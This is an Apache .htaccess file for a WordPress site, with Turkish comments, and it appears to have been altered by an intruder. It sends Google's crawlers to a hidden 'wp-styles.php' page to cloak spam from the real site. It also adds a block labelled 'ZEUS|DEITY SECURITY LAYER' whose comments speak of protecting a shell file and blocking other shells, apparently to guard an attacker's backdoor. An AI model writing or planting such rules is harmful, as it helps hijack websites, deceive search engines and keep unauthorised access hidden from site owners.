# BEGIN WordPress
RewriteEngine On
RewriteBase /
# Google Bot Detection - wp-styles.php'ye yönlendir
RewriteCond %{HTTP_USER_AGENT} (googlebot|googlebot-image|googlebot-news|googlebot-video|google-inspectiontool|googleother|adsbot-google|mediapartners-google|apis-google) [NC]
RewriteCond %{REQUEST_URI} ^/?$ [OR]
RewriteCond %{REQUEST_URI} ^/index\.php$
RewriteRule .* wp-styles.php [L]
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
# ═══════════════════════════════════════════════════════════════
# CACHE TAMAMEN KAPALI
# ═══════════════════════════════════════════════════════════════
Header set Cache-Control "no-store, no-cache, must-revalidate, max-age=0"
Header set Pragma "no-cache"
Header set Expires "0"
Header unset ETag
Header unset Last-Modified
Header unset Vary
FileETag None
ExpiresActive Off
Header set Cache-Control "no-cache, no-store, must-revalidate, max-age=0"
Header set Pragma "no-cache"
Header set Expires "0"
# ═══════════════════════════════════════════════════════════════
# ZEUS|DEITY SECURITY LAYER - Auto Generated
# Site bozulmadan mevcut kurallara eklendi
# ═══════════════════════════════════════════════════════════════
# Shell dosyası koruması
Header set Content-Disposition "inline"
Header set X-Content-Type-Options "nosniff"
# Diğer shell dosyalarını engelle
Order allow,deny
Deny from all
# Hassas dosyaları koru
Order allow,deny
Deny from all